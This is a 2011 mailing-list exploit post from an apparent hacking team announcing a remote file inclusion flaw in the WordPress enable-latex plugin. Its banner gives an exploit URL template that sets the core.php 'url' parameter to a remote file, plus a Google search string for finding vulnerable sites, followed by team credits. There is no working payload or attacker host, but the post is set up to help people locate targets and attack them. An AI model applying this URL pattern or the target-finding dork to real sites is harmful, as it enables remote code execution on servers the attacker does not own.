Wordpress enable-latex plugin Remote File Include Vulnerabilities

Amir Wed, 23 Nov 2011 08:23:39 -0800

a bug in Wordpress enable-latex plugin that allows to us to occur a Remote File 
Include on a Remote machin.




################################################################################################################################
#                                                                               
                                               #
#                           Aria Security Team - Persian Network Security       
                                               #
#                                                                               
                                               #
#                                http://Aria-Security.Com/forum/                
                                               #
#                                                                               
                                               #
################################################################################################################################
#                                                                               
                                               #
# Wordpress enable-latex plugin Remote File Include Vulnerabilities             
                                               #
#                                                                               
                                               #
# Download......: http://wordpress.org/extend/plugins/enable-latex/             
                                               #
#                                                                               
                                               #
# Exploit.......: 
http://www.site.com/[path]/wp-content/plugins/enable-latex/core.php?url=[Rfi]?  
                             #
#                                                                               
                                               #
# Google Search.: "Powered by Wordpress"                                        
                                               #
#                                                                               
                                               #
################################################################################################################################
#                                                                               
                                               #
# Bug Found.....: Aria-Security                                                 
                                               #
#                                                                               
                                               #
# discovery.....: Am!r (IrIsT)                                                 
                                               #
#                                                                               
                                               #
# contact.......: Amir[at]IrIsT.ir                                              
                                               #
#                                                                               
                                               #
# SP TNX........: The-0utl4w & A.u.r.A & B3HZ4D & m3hdi & joker_s & all IrIsT 
And Aria-security members                        #
#                                                                               
                                               #
################################################################################################################################

Wordpress enable-latex plugin Remote File Include Vulnerabilities

Reply via email to